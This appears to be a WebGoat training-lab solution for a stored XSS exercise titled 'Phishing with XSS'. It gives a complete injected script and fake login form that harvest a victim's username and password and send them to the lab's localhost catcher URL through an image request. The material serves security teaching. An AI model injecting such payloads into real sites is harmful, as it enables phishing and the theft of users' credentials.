Solution Lab Block Stored XSS

Lesson Plan Title: Phishing with XSS

Concept / Topic To Teach:
It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is used in an HTTP response. With the help of XSS you can do a Phishing Attack and add content to a page which looks official. It is very hard for a victim to determinate that the content is malicious.

General Goal(s):
The user should be able to add a form asking for username and password. On submit the input should be sent to http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catchedPasswordName

Solution:
With XSS it is possible to add further elements to an exsisting Page. This solution consists of two parts you have to combine:

A form the victim has to fill in
A script which reads the form and sends the gathered information to the attacker

A Form whith username and password could look like this:

<form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br></form><br><br><HR>

Search for this term and you will see that a form is added to the page.

Now you need a script:

This script will read the input from the form and send it to the catcher of WebGoat.

The last step is to put things together. Add a Button to the form which calls the script. You can reach this wicht the onclick="myFunction" handler.

The final String looks like this:
<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";} </script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

Search for this String and you will see a form asking for your username and password. Fill in these fields and click on the Login Button.